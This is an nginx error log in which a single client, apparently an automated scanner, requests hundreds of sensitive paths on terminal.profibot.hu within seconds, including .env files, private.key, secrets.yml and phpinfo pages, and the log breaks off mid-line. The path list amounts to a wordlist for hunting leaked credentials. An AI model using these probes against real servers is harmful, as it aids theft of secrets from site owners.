"terminal.profibot.hu" +2026/01/28 01:44:29 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpinfo.txt HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:29 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpinfo/info.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:29 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpinfo/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:29 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpinfo1.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:29 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpinfo2.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:29 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpinfo3.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:29 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpinfo4.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:29 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpinfodev.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:29 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpinfos.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:29 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpMyAdmin/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:29 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpmyadmin/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:29 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpsysinfo HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:29 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpsysinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:29 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpsysinfo/info.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:29 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpsysinfo/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:29 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpsysinfo/phpsysinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:29 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phptest.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:29 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpversion.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:29 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /pi.php5 HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:29 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /pictures/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:29 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /platform/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:29 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /playground/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:29 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /plugin_static/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:29 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /plugins/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:30 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /post-deployment/.vscode/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:30 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /postfixadmin/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:30 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /prestashop/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:30 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /preview-env/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:30 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /preview/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:30 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /price_hawk_client/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:30 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /prisma/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:30 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /private.key HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:30 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /processor/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:30 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /Procfile HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:30 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /prod/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:30 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /product/.env.staging HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:30 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /projbackend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:30 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /project/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:30 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /project_root/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:30 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /protected/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:30 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /psnlink/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:30 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /pt2/countries/src/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:30 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /pt8/library-backend-gql/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:30 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /pub/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:30 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /public/system HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:30 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /public_html/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:30 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /public_root/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:30 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /q.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:30 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /qq.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:30 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /question2/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:30 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /qv-frontend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:30 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /rabbitmq-cluster/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:30 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /rails-api/react-app/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:30 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /rails/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:30 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /rasax/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:30 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /react/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:31 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /react_todo/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:31 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /redmine/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:31 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /repo/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:31 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /repos/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:31 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /repository/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:31 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /resources/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:31 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /resources/docker/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:31 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /resources/docker/mysql/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:31 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /resources/docker/phpmyadmin/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:31 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /resources/docker/rabbitmq/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:31 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /resources/docker/rediscommander/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:31 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /resourcesync/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:31 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /rest.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:31 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /rest/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:31 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /restapi/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:31 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /results/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:31 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /robots.txt HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:31 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /robots/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:31 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /rollup.config.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:31 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /root/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:31 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /rosterBack/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:31 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /roundcube/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:31 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /roundcubemail/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:31 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /routes/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:31 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /run/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:31 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /rust-backend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:31 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /rust-backend/dao/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:31 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /s-with-me-front/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:31 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /s3.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:31 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /saas/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:31 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /samples/chatroom/chatroom-spa/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:31 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /samples/docker/deploymentscripts/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:32 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /sapi/debug/default/view HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:32 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /script/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:32 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /scripts/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:32 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /scripts/fvt/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:32 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /secrets.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:32 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /secrets.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:32 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /secrets/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:32 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /selfish-darling-backend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:32 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /sendgrid.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:32 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /serve-browserbench/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:32 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /Serve_time_server/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:32 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /server-status HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:32 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /server.log HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:32 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /server/config/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:32 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /server/laravel/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:32 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /server/s3.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:32 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /server/src/persistence/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:32 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /Server_with_db/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:32 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /serverless.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:32 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /service-worker.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:32 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /service/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:32 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /services/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:32 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /services/adminer/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:32 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /services/deployment-agent/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:32 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /services/documents/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:32 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /services/graylog/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:32 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /services/jaeger/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:32 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /services/minio/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:32 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /services/monitoring/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:32 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /services/portainer/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:32 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /services/redis-commander/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:32 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /services/registry/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:33 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /services/simcore/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:33 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /services/traefik/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:33 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /sessions/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:33 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /settings.py HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:33 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /shared/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:33 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /shibboleth/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:33 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /shop/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:33 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /shopware/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:33 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /Simple_server/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:33 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /site-library/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:33 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /sitemaps/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:33 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /sites/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:33 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /sitestatic/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:33 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /Socketio/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:33 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /source/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:33 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /sources/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:33 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /Sources/API/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:33 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /spearmint/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:33 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /spikes/config-material-app/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:33 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /SpotiApps/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:33 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /src/__tests__/__fixtures__/instanceWithDependentSteps/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:33 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET 